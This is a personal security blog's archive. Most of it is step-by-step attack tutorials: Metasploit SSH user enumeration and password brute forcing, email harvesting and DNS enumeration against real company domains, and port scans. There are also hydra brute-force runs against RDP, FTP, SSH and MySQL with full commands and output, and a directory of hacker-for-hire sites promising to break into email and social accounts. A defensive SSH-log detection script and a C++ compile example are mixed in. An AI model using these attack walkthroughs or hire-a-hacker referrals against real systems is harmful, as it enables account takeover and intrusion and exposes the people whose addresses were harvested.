Want to hire hackers? Some Hackers for Hire Website List

The site has moved to the root domain, where all posts have been imported. Please go to http://pusheax.com/

I have seen some hackers-for-hire companies advertising their hacking services. They promise to hack email passwords, social account passwords, databases, even smartphones.

Some of them are fake hackers-for-hire companies (going by their customers' complaints) and some are real companies where you can hire a professional hacker.

I will list some companies here, but it is your responsibility to verify them before working with them, because I am not reviewing their services. It is just a short list of hacking services websites. So be careful!

Hackers for Hire site list

  1. centralhacker.com (Central hacker seems legit though)
  2. hirehackeronline.com (SEO purpose or real?)
  3. hacker1337.com ( Hacker 1337 open for long time)
  4. goldenhacker.com (Golden Hacker , Mean gold hacker?)
  5. hackeris.com
  6. neighborhoodhacker.com (Long time in business? They do the job?)
  7. hirethehacker.com (SEO Purpose or real)
  8. cryptohackers.com
  9. hireanhacker.com
  10. hirenhack.com (Seems new in business!)

Again, I am not doing any review of their hacking services. This list is for those who are looking to hire a hacker.

Warning: Be careful, most of them might be just a scam and some may be for real!!!

Integer and String Based SQL Injection Tutorial

After getting a tutorial about IBM AppScan from Central Hacker, who also describe themselves as hackers for hire, I found two more tutorials on SQL injection.

They used SQLI-LAB, but it is still good to follow. As hackers for hire, should they post examples and tutorials against real sites?

Anyway, you can read these tutorials on their blog:

Integer Single Quote SQL Injection  

String Based SQL Injection

Note: pusheax does not have any kind of relationship with this kind of company. It is just about sharing documents!

Hacking SSH with Metasploit Auxiliary Modules

SSH is another popular service targeted by hackers. In this post I am going to show how to use Metasploit modules to run a dictionary or brute force attack against an SSH server.

First we need to find valid users for the password guessing attack. We can enumerate usernames with the Metasploit auxiliary/scanner/ssh/ssh_enumusers module:

msf auxiliary(dns_srv_enum) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > show options

Module options (auxiliary/scanner/ssh/ssh_enumusers):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      22               yes       The target port
   THREADS    1                yes       The number of concurrent threads
   THRESHOLD  10               yes       Amount of seconds needed before a user is considered found
   USER_FILE                   yes       File containing usernames, one per line

msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_enumusers) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
msf auxiliary(ssh_enumusers) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_enumusers) > run

[*] 192.168.67.136:22 – SSH – Checking for false positives
[*] 192.168.67.136:22 – SSH – Starting scan
[+] 192.168.67.136:22 – SSH – User ‘root’ found
[!] 192.168.67.136:22 – SSH – User ‘owaspbroken’ not found
[!] 192.168.67.136:22 – SSH – User ‘broken’ not found
[!] 192.168.67.136:22 – SSH – User ‘mag’ not found
[!] 192.168.67.136:22 – SSH – User ‘admin’ not found
[!] 192.168.67.136:22 – SSH – User ‘Administrator’ not found
[!] 192.168.67.136:22 – SSH – User ‘owaspbwa’ not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >

The username ‘root’ is found. Let’s do something else…. thinking… thinking!

Let’s find out the SSH server version, for future reference when looking for exploits:

msf auxiliary(ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_version) > run

[*] 192.168.67.136:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Well, now let’s guess the password. Always try to have a good password list, otherwise it will be a waste of time: password guessing against SSH is slow. Anyway, here is how we can hack the SSH server:

msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > set USERASS_FILE true
USERASS_FILE => true
msf auxiliary(ssh_login) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH – Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set PASSWORD owaspbwa
PASSWORD => owaspbwa
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH – Starting bruteforce
[+] 192.168.67.136:22 SSH – Success: ‘root:owaspbwa’ ‘uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux ‘
[*] Command shell session 1 opened (192.168.67.139:44027 -> 192.168.67.136:22) at 2014-12-17 04:23:57 -0500
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘Administrator:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbwa:owaspbwa’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/users
PASS_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > run

[*] 192.168.67.136:22 SSH – Starting bruteforce
[+] 192.168.67.136:22 SSH – Success: ‘root:owaspbwa’ ‘uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux ‘
[*] Command shell session 2 opened (192.168.67.139:43450 -> 192.168.67.136:22) at 2014-12-17 04:25:06 -0500
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:root’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:owaspbroken’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:broken’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:mag’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:admin’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:Administrator’
[-] 192.168.67.136:22 SSH – Failed: ‘owaspbroken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:root’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:owaspbroken’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:broken’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:mag’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:admin’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:Administrator’
[-] 192.168.67.136:22 SSH – Failed: ‘broken:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:root’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:owaspbroken’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:broken’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:mag’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:admin’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:Administrator’
[-] 192.168.67.136:22 SSH – Failed: ‘mag:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:owaspbwa’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:root’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:owaspbroken’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:broken’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:mag’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:admin’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:Administrator’
[-] 192.168.67.136:22 SSH – Failed: ‘admin:owaspbwa’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >

Let me know if you have questions!
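
From the defender's side, the enumeration and guessing runs above leave a distinct trail in the target's sshd log: one source address, many usernames in a few seconds, and an accepted login close by. The following is an added example, not part of the original post, that finds that pattern; the log lines are constructed in OpenSSH's usual auth.log wording, and the function names and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple

# Constructed sample in OpenSSH's usual auth.log wording (not captured from the lab).
# 192.168.67.139 is the scanning host from the session above; 192.168.67.1 is a
# made-up administrator workstation that mistypes its password once.
SAMPLE_LOG = """\
Dec 17 04:23:50 owaspbwa sshd[2100]: Failed password for root from 192.168.67.1 port 51022 ssh2
Dec 17 04:23:55 owaspbwa sshd[2100]: Accepted password for root from 192.168.67.1 port 51022 ssh2
Dec 17 04:25:06 owaspbwa sshd[2111]: Accepted password for root from 192.168.67.139 port 43450 ssh2
Dec 17 04:25:07 owaspbwa sshd[2112]: Failed password for invalid user owaspbroken from 192.168.67.139 port 43451 ssh2
Dec 17 04:25:08 owaspbwa sshd[2113]: Failed password for invalid user broken from 192.168.67.139 port 43452 ssh2
Dec 17 04:25:09 owaspbwa sshd[2114]: Failed password for invalid user mag from 192.168.67.139 port 43453 ssh2
Dec 17 04:25:10 owaspbwa sshd[2115]: Failed password for invalid user admin from 192.168.67.139 port 43454 ssh2
Dec 17 04:25:11 owaspbwa sshd[2116]: Failed password for invalid user Administrator from 192.168.67.139 port 43455 ssh2
Dec 17 04:25:12 owaspbwa sshd[2117]: Failed password for invalid user owaspbwa from 192.168.67.139 port 43456 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?P<invalid>invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


class Event(NamedTuple):
    ts: datetime
    src: str
    user: str
    accepted: bool
    invalid: bool  # sshd reported the account as nonexistent


def parse_auth_log(text, year=2014):
    """Extract password-authentication events; syslog timestamps carry no year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue  # not a password-auth line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append(Event(ts, m["src"], m["user"],
                            m["result"] == "Accepted", m["invalid"] is not None))
    return sorted(events, key=lambda e: e.ts)


def detect_guessing(events, max_failures=5, window=timedelta(minutes=5)):
    """One finding per source whose failures reach max_failures inside any window."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev.src].append(ev)

    findings = []
    for src, evs in sorted(by_src.items()):
        fails = [e for e in evs if not e.accepted]
        worst, start = 0, 0
        for end in range(len(fails)):  # sliding window over the failures
            while fails[end].ts - fails[start].ts > window:
                start += 1
            worst = max(worst, end - start + 1)
        if worst < max_failures:
            continue
        # An accepted login near the failures, before or after them, means one
        # of the guesses probably worked; the session above shows the success first.
        hits = sorted({e.user for e in evs if e.accepted
                       and any(abs(e.ts - f.ts) <= window for f in fails)})
        findings.append({
            "src": src,
            "failures_in_window": worst,
            "users_tried": sorted({f.user for f in fails}),
            "invalid_users": sorted({f.user for f in fails if f.invalid}),
            "accepted_for": hits,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_guessing(parse_auth_log(SAMPLE_LOG)):
        print(finding)
```

A non-empty accepted_for list is the finding to act on first: it names the account whose password should be treated as known to the source address.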

Metasploit Information Gathering Basic[Search for info]

Metasploit is an open source penetration testing framework. Using some Metasploit auxiliary modules we can gather information about our target. Let’s see, in simple steps, how to collect emails.

msf > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) > show options

Module options (auxiliary/gather/search_email_collector):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   DOMAIN                          yes       The domain name to locate email addresses for
   OUTFILE                         no        A filename to store the generated email list
   SEARCH_BING    true             yes       Enable Bing as a backend search engine
   SEARCH_GOOGLE  true             yes       Enable Google as a backend search engine
   SEARCH_YAHOO   true             yes       Enable Yahoo! as a backend search engine

msf auxiliary(search_email_collector) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails …..
[*] Searching Google for email addresses from microsoft.com
[*] Extracting emails from Google search results…
[*] Searching Bing email addresses from microsoft.com
[*] Extracting emails from Bing search results…
[*] Searching Yahoo for email addresses from microsoft.com
[*] Extracting emails from Yahoo search results…
[*] Located 0 email addresses for microsoft.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) > set DOMAIN cisco.com
DOMAIN => cisco.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails …..
[*] Searching Google for email addresses from cisco.com
[*] Extracting emails from Google search results…
[*] Searching Bing email addresses from cisco.com
[*] Extracting emails from Bing search results…
[*] Searching Yahoo for email addresses from cisco.com
[*] Extracting emails from Yahoo search results…
[*] Located 2 email addresses for cisco.com
[*]     gsahagun@cisco.com
[*]     vern@cisco.com
[*] Auxiliary module execution completed
msf auxiliary(search_email_collector) >

Microsoft is a little scared to post their email addresses publicly?

Let’s find some DNS information about microsoft.com with Metasploit:

msf auxiliary(shodan_search) > use auxiliary/gather/dns_info
msf auxiliary(dns_info) > show options

Module options (auxiliary/gather/dns_info):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   DOMAIN                   yes       The target domain name
   NS                       no        Specify the name server to use for queries, otherwise use the system configured DNS Server is used.

msf auxiliary(dns_info) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_info) > run

[*] Enumerating microsoft.com
[+] microsoft.com – Address 134.170.188.221 found. Record type: A
[+] microsoft.com – Address 134.170.185.46 found. Record type: A
[+] microsoft.com – Name server ns4.msft.net (208.76.45.53) found. Record type: NS
[+] microsoft.com – Name server ns4.msft.net (2620:0:37::53) found. Record type: NS
[+] microsoft.com – Name server ns1.msft.net (208.84.0.53) found. Record type: NS
[+] microsoft.com – Name server ns1.msft.net (2620:0:30::53) found. Record type: NS
[+] microsoft.com – Name server ns2.msft.net (208.84.2.53) found. Record type: NS
[+] microsoft.com – Name server ns2.msft.net (2620:0:32::53) found. Record type: NS
[+] microsoft.com – Name server ns3.msft.net (193.221.113.53) found. Record type: NS
[+] microsoft.com – Name server ns3.msft.net (2620:0:34::53) found. Record type: NS
[+] microsoft.com – ns1.msft.net (208.84.0.53) found. Record type: SOA
[+] microsoft.com – ns1.msft.net (2620:0:30::53) found. Record type: SOA
[+] microsoft.com – Mail server microsoft-com.mail.protection.outlook.com (207.46.163.170) found. Record type: MX
[+] microsoft.com – Mail server microsoft-com.mail.protection.outlook.com (207.46.163.138) found. Record type: MX
[+] microsoft.com – Mail server microsoft-com.mail.protection.outlook.com (207.46.163.215) found. Record type: MX
[+] microsoft.com – Text info found: v=spf1 include:_spf-a.microsoft.com include:_spf-b.microsoft.com include:_spf-c.microsoft.com include:_spf-ssg-a.microsoft.com include:spf-a.hotmail.com ip4:147.243.128.24 ip4:147.243.128.26 ip4:147.243.128.25 ip4:147.243.1.47 ip4:147.243.1.48 -all . Record type: TXT
[+] microsoft.com – Text info found: FbUF6DbkE+Aw1/wi9xgDi8KVrIIZus5v8L6tbIQZkGrQ/rVQKJi8CjQbBtWtE64ey4NJJwj5J65PIggVYNabdQ== . Record type: TXT
[*] Auxiliary module execution completed
msf auxiliary(dns_info) > 


To find SRV records, do the following:

msf auxiliary(dns_info) > use auxiliary/gather/dns_srv_enum
msf auxiliary(dns_srv_enum) > show options

Module options (auxiliary/gather/dns_srv_enum):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   ALL_NS  false            no        Run against all name servers for the given domain.
   DOMAIN                   yes       The target domain name.

msf auxiliary(dns_srv_enum) > set DOMAIN microsoft.com
DOMAIN => microsoft.com
msf auxiliary(dns_srv_enum) > run

[*] Enumerating SRV Records for microsoft.com
[+] Host: sipfed.microsoft.com IP: 131.107.255.86 Service: sipfederationtls Protocol: tcp Port: 5061
[+] Host: sipdog3.microsoft.com IP: 131.107.1.47 Service: xmpp-server Protocol: tcp Port: 5269
[*] Auxiliary module execution completed

I was a bit lazy about formatting the text as code, so this might be a little hard to read. But I think you now have a basic idea of how you can use Metasploit for information gathering. If you would like to see more details or have any questions, you can post comments here.

  

Metasploit Port Scanning

Port scanning is often done by hackers and penetration testers to identify and discover the services running on a target host. It is an important step in gathering more information about the target host. Today we will see how to use Metasploit to scan ports. Metasploit is a popular free and open source exploitation framework, widely used by hackers and professional penetration testers. Let’s see how we can use Metasploit for basic port scanning.

If you have Kali Linux then Metasploit is already installed! Otherwise download it from Rapid7 and install it.

Our Target: http://192.168.67.136/ 

Our First Module is auxiliary/scanner/portscan/syn

Now let’s start scanning!


msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   INTERFACE                   no        The name of the interface
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target address range or CIDR identifier
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The reply read timeout in milliseconds

We simply need to set RHOSTS, which is 192.168.67.136, and the port range 1-65535 (do you really want to scan all ports?):

msf auxiliary(syn) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(syn) > set PORTS 80,3306,22,1337
PORTS => 80,3306,22,1337
msf auxiliary(syn) >

Now set the interesting ports and execute the “run” command:

msf auxiliary(syn) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(syn) > run

[*]  TCP OPEN 192.168.67.136:22
[*]  TCP OPEN 192.168.67.136:80
[*]  TCP OPEN 192.168.67.136:139
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >

Now let’s see how auxiliary/scanner/portscan/tcp works:

msf auxiliary(tcp) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(tcp) > set PORTS 80,3306,22,1337,139
PORTS => 80,3306,22,1337,139
msf auxiliary(tcp) > run

[*] 192.168.67.136:139 – TCP OPEN
[*] 192.168.67.136:22 – TCP OPEN
[*] 192.168.67.136:80 – TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

Really easy, but nmap is best!

More Metasploit Tutorials Coming soon! 🙂

Hacker For Hire

Hacker for hire? What do you mean by that?

PushEax now offers ethical hacker-for-hire services widely.

What can PushEax do for you?

Website hacking & security analysis, account security checking, virus removal, computer forensics and many more.

Does it cost money to hire a hacker?

PushEax will work hard for you. So it costs money!

How many services do you provide?

There are many hacker-for-hire services that pusheax offers. If something is missing, just contact us.

PushEax deals with server hacking, password hacking, email hacking and more security analysis services. PushEax now provides most kinds of white hat hacking services widely.

Compiling c++ multiple sources file

Compiling multiple C++ source files with g++ is easy, but it requires a little manual work. It can be made easier and more straightforward with a makefile, but I will give only a simple example here. If you think you need a makefile example too then you can search Google or write a comment and I will update this post!

I hope you already understand the basics of C++, like functions, classes etc.

C++ source file one

#include <iostream>
#include "hell.h"

// Declared in hell.h; calls testing1() from the second source file.
void testing(){
    std::cout<<"Test\n";
    testing1();
}

int main(){
    std::cout<<"Test\n";
    testing();

    return 0;
}

C++ source file two

#include "hell.h"

// Uses the class Test declared in hell.h.
void testing1(){
    Test tt;
    tt.t="LALA";
    std::cout<<"Hello world 2\n"<<tt.t<<std::endl;
    tt.h();
}

// Definition of the method declared in class Test.
void Test::h(){
    std::cout<<"C++ method\n";
}


I declared an object named tt of the class called “Test”.
t is a variable declared in the header file, so tt.t means “use the variable from class Test!”.
You can write any valid code in the function or in the C++ class method!

C++ Header file

#ifndef HELL_H // If HELL_H is not defined yet, process the lines below
#define HELL_H // Define it so the header is only included once

#include <iostream>
#include <string> // for std::string

void testing1();
void testing();

class Test{
public:
    std::string t;
    void h();
};

#endif // Include guard done!

Compiling the sources with g++ is simple:

g++ main.cpp main2.cpp -o main

pro@pusheax:~/coding/c++/basic/multi$ ./main
Test
Test
Hello world 2
LALA
C++ method

Thanks for reading!

Brute force attack & dictionary password cracking using hydra

Brute force and dictionary password cracking attacks are still effective. A brute force attack can be more effective if the hacker has good knowledge of password profiling and information gathering. Today I will briefly explain how a hacker can crack passwords using a hydra brute force or dictionary attack. Before that, let me give you a short definition of brute force and dictionary attacks.

Brute force attack

A brute force attack tries combinations of all characters: a-z, A-Z, 1-3 and other special characters.

Dictionary password attack

A dictionary attack uses a list of common passwords. For example, you know “admin” is used as a password to protect various confidential resources, so you put the word “admin” in your dictionary file. You can also download free password lists from various sources (Google search!). If the hacker is lucky then the password will be in the list.

I will explain how a hacker can make a brute force attack using hydra to crack various online accounts.

Brute Force Attack

If hackers decide to make a pure brute force attack then they need to leave out the option ‘-P’ and use ‘-x min:max:char’, for example ‘-x 3:3:a’:

root@find:~/Desktop# hydra -t 10 -V -f -l root -x 4:6:a ftp://192.168.67.132

The hydra syntax:
-t = Number of parallel attempts at a time (1/5/10/100?). Don’t use too many, otherwise you will get false results
-V = Show output
-f = Stop when the password is found
-l = The username (-L for usernames from a file)
-P = Dictionary file
IP-address-or-domain module-such-as-http-form

Cracking the RDP password

We know the default username on Windows is “administrator”, so we only need to brute force the password:

root@find:~/Desktop# hydra -t 1 -V -f -l administrator -P common.txt rdp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:24:21
[DATA] 1 task, 1 server, 933 login tries (l:1/p:933), ~933 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Admin" - 1 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Administration" - 2 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "crm" - 3 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CVS" - 4 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS" - 5 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS25" - 6 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS31" - 7 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "INSTALL_admin" - 8 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Log" - 9 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Logs" - 10 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Pages" - 11 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "youradmin" - 12 of 933 [child 0]
[3389][rdp] host: 192.168.67.132 login: administrator password: youradmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:24:46

I did it on VMware Workstation and it was too slow!

Cracking FTP password

The hacker knows the FTP user name is 'root', so the hacker makes a quick password guessing run with the following command:

root@find:~/Desktop# hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:45:55
[DATA] 5 tasks, 1 server, 934 login tries (l:1/p:934), ~186 tries per task
[DATA] attacking service ftp on port 21
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Admin" - 1 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Administration" - 2 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "crm" - 3 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CVS" - 4 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS" - 5 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS25" - 6 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS31" - 7 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "INSTALL_admin" - 8 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Log" - 9 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Logs" - 10 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Pages" - 11 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "youradmin" - 12 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "ftpadmin" - 13 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlet" - 14 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlets" - 15 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "SiteServer" - 16 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Sources" - 17 of 934 [child 0]
[21][ftp] host: 192.168.67.132 login: root password: ftpadmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:45:55
root@find:~/Desktop#

Here the password is ftpadmin!

root@find:~/Desktop# ftp 192.168.67.132
Connected to 192.168.67.132.
220 Hello, I'm freeFTPd 1.0
Name (192.168.67.132:root): root
331 Password required for root
Password:
230 User root logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection
drwxr-xr-x 1 root root 0 Jan 7 13:39 .
drwxr-xr-x 1 root root 0 Jan 7 13:39 ..
226 Directory send OK

Cracking SSH password with hydra

root@find:~/Desktop# hydra -t 5 -V -f -l root -P common.txt localhost ssh
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:11:56
[DATA] 5 tasks, 1 server, 935 login tries (l:1/p:935), ~187 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target localhost - login "root" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS" - 5 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS25" - 6 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS31" - 7 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "INSTALL_admin" - 8 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "Log" - 9 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "sshfuck" - 10 of 935 [child 0]
[22][ssh] host: 127.0.0.1 login: root password: sshfuck
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:11:58

MySQL password cracking using hydra

In this case we are going to crack an empty MySQL password. Some people still do not use a password to protect their database server. We can make a brute force attack like this:

root@find:~/Desktop# hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:18:16
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] 4 tasks, 1 server, 937 login tries (l:1/p:937), ~234 tries per task
[DATA] attacking service mysql on port 3306
[ATTEMPT] target localhost - login "root" - pass "root" - 1 of 937 [child 0]
[ATTEMPT] target localhost - login "root" - pass "" - 2 of 937 [child 1]
[ATTEMPT] target localhost - login "root" - pass "Admin" - 3 of 937 [child 2]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 4 of 937 [child 3]
[3306][mysql] host: 127.0.0.1 login: root password:
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:18:16

